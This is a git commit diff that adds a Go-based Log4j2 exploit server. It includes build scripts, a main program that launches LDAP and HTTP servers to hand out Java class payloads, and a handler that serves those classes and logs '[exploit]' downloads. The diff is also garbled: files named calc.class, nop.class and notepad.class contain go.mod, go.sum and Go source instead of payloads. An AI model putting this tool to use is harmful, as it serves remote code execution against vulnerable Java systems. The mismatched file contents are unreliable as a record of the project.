add log4j2-exploit server, add some simple payloads.

Author: For-ACGN

.gitignore

@@ -13,3 +13,6 @@
 
 # Dependency directories (remove the comment below to include it)
 # vendor/
+
+# GoLand
+.idea

cmd/build.bat

@@ -0,0 +1 @@
+go build -v -trimpath -ldflags "-s -w" -o log4j2-exp.exe

cmd/build.sh

@@ -0,0 +1 @@
+go build -v -trimpath -ldflags "-s -w" -o log4j2-exp

cmd/main.go

@@ -0,0 +1,86 @@
+package main
+
+import (
+	"crypto/tls"
+	"flag"
+	"fmt"
+	"log"
+	"os"
+	"os/signal"
+
+	"github.com/For-ACGN/log4j2"
+)
+
+var (
+	cfg log4j2.Config
+	crt string
+	key string
+)
+
+func init() {
+	banner()
+
+	flag.CommandLine.SetOutput(os.Stdout)
+	flag.StringVar(&cfg.Hostname, "host", "127.0.0.1", "server IP address or domain name")
+	flag.StringVar(&cfg.ClassDirectory, "dir", "payload", "payload(java class) directory")
+	flag.StringVar(&cfg.HTTPNetwork, "http-net", "tcp", "http server network")
+	flag.StringVar(&cfg.HTTPAddress, "http-addr", ":8080", "http server address")
+	flag.StringVar(&cfg.LDAPNetwork, "ldap-net", "tcp", "ldap server network")
+	flag.StringVar(&cfg.LDAPAddress, "ldap-addr", ":389", "ldap server address")
+	flag.BoolVar(&cfg.EnableTLS, "tls", false, "enable ldaps and https server")
+	flag.StringVar(&crt, "tls-cert", "cert.pem", "tls certificate file path")
+	flag.StringVar(&key, "tls-key", "key.pem", "tls private key file path")
+	flag.Parse()
+}
+
+func banner() {
+	fmt.Println()
+	fmt.Println("  :::        ::::::::   ::::::::      :::   ::::::::::: ::::::::  ")
+	fmt.Println("  :+:       :+:    :+: :+:    :+:    :+:        :+:    :+:    :+: ")
+	fmt.Println("  +:+       +:+    +:+ +:+          +:+ +:+     +:+          +:+  ")
+	fmt.Println("  +#+       +#+    +:+ :#:         +#+  +:+     +#+        +#+    ")
+	fmt.Println("  +#+       +#+    +#+ +#+   +#+# +#+#+#+#+#+   +#+      +#+      ")
+	fmt.Println("  #+#       #+#    #+# #+#    #+#       #+# #+# #+#     #+#       ")
+	fmt.Println("  ########## ########   ########        ###  #####     ########## ")
+	fmt.Println()
+	fmt.Println("                           https://github.com/For-ACGN/log4j2-exp")
+	fmt.Println()
+}
+
+func main() {
+	// check configuration
+	if cfg.Hostname == "" {
+		log.Fatalln("[error]", "empty host name")
+	}
+	fi, err := os.Stat(cfg.ClassDirectory)
+	checkError(err)
+	if !fi.IsDir() {
+		log.Fatalf("[error] \"%s\" is not a directory", cfg.ClassDirectory)
+	}
+	// load tls certificate
+	if cfg.EnableTLS {
+		cfg.TLSCert, err = tls.LoadX509KeyPair(crt, key)
+		checkError(err)
+	}
+	cfg.LogOut = os.Stdout
+
+	// start log4j2-exploit server
+	server, err := log4j2.New(&cfg)
+	checkError(err)
+	err = server.Start()
+	checkError(err)
+
+	// wait signal for stop log4j2-exploit server
+	signalCh := make(chan os.Signal, 1)
+	signal.Notify(signalCh, os.Interrupt)
+	<-signalCh
+
+	err = server.Stop()
+	checkError(err)
+}
+
+func checkError(err error) {
+	if err != nil {
+		log.Fatalln("[error]", err)
+	}
+}

cmd/payload/calc.class

@@ -0,0 +1,17 @@
+module github.com/For-ACGN/log4j2
+
+go 1.17
+
+require (
+	github.com/For-ACGN/ldapserver v1.0.3
+	github.com/pkg/errors v0.9.1
+	github.com/stretchr/testify v1.7.0
+
+	github.com/lor00x/goldap v0.0.0-20180618054307-a546dffdd1a3
+)
+
+require (
+	github.com/davecgh/go-spew v1.1.0 // indirect
+	github.com/pmezard/go-difflib v1.0.0 // indirect
+	gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c // indirect
+)

cmd/payload/nop.class

@@ -0,0 +1,17 @@
+github.com/For-ACGN/ldapserver v1.0.3 h1:MJBxjBNGK0QwnHvUAR3njpiVlqqqgmLEZPfe0ze22h0=
+github.com/For-ACGN/ldapserver v1.0.3/go.mod h1:CyMXeyg387oRKs9yLWKkPqcfz2nkCzTrHl7b0i4vzBE=
+github.com/davecgh/go-spew v1.1.0 h1:ZDRjVQ15GmhC3fiQ8ni8+OwkZQO4DARzQgrnXU1Liz8=
+github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/lor00x/goldap v0.0.0-20180618054307-a546dffdd1a3 h1:wIONC+HMNRqmWBjuMxhatuSzHaljStc4gjDeKycxy0A=
+github.com/lor00x/goldap v0.0.0-20180618054307-a546dffdd1a3/go.mod h1:37YR9jabpiIxsb8X9VCIx8qFOjTDIIrIHHODa8C4gz0=
+github.com/pkg/errors v0.9.1 h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4=
+github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=
+github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
+github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
+github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
+github.com/stretchr/testify v1.7.0 h1:nwc3DEeHmmLAfoZucVR881uASk0Mfjw8xYJ99tb5CcY=
+github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
+gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM=
+gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
+gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c h1:dUUwHk2QECo/6vqA44rthZ8ie2QXMNeKRTHCNY2nXvo=
+gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=

cmd/payload/notepad.class

@@ -0,0 +1,75 @@
+package log4j2
+
+import (
+	"log"
+	"net/http"
+	"os"
+	"path/filepath"
+	"strings"
+)
+
+type httpHandler struct {
+	logger *log.Logger
+
+	classDir string
+	secret   string
+}
+
+func (h *httpHandler) ServeHTTP(w http.ResponseWriter, r *http.Request) {
+	h.logger.Printf("[info] http client %s request %s", r.RemoteAddr, r.RequestURI)
+
+	var success bool
+	defer func() {
+		if !success {
+			w.WriteHeader(http.StatusNotFound)
+		}
+	}()
+
+	// check url structure
+	sections := strings.SplitN(r.RequestURI, "/", 3)
+	if len(sections) < 3 {
+		h.logger.Println("[error]", "invalid request url structure:", r.RequestURI)
+		return
+	}
+
+	// compare secret
+	if sections[0] != "" || sections[1] != h.secret {
+		h.logger.Println("[warning]", "invalid secret:", sections[1])
+		return
+	}
+
+	// prevent arbitrary file read
+	path := sections[2]
+	if strings.Index(path, "../") != -1 || strings.Index(path, "/..") != -1 {
+		h.logger.Println("[warning]", "found slash in url:", r.RequestURI)
+		return
+	}
+
+	// convert "/secret/calc.class/Main.class" to "/secret/calc.class"
+	//         "/secret/Main.class/other.class" to "/secret/other.class"
+	// path = strings.Replace(path, "Main.class", "", 1)
+	// fmt.Println("path:", path)
+	// path = filepath.Join(h.classDir, path)
+
+	idx := strings.LastIndex(path, "/")
+	if idx == -1 {
+		h.logger.Println("[error]", "invalid request url structure:", r.RequestURI)
+		return
+	}
+	path = filepath.Join(h.classDir, path[:idx])
+
+	// read file and send to client
+	class, err := os.ReadFile(path)
+	if err != nil {
+		h.logger.Println("[error]", "failed to read file:", err)
+		return
+	}
+	success = true
+	w.WriteHeader(http.StatusOK)
+	_, err = w.Write(class)
+	if err != nil {
+		h.logger.Println("[error]", "failed to write class file:", err)
+		return
+	}
+	h.logger.Printf("[exploit] http client %s download %s", r.RemoteAddr, path)
+}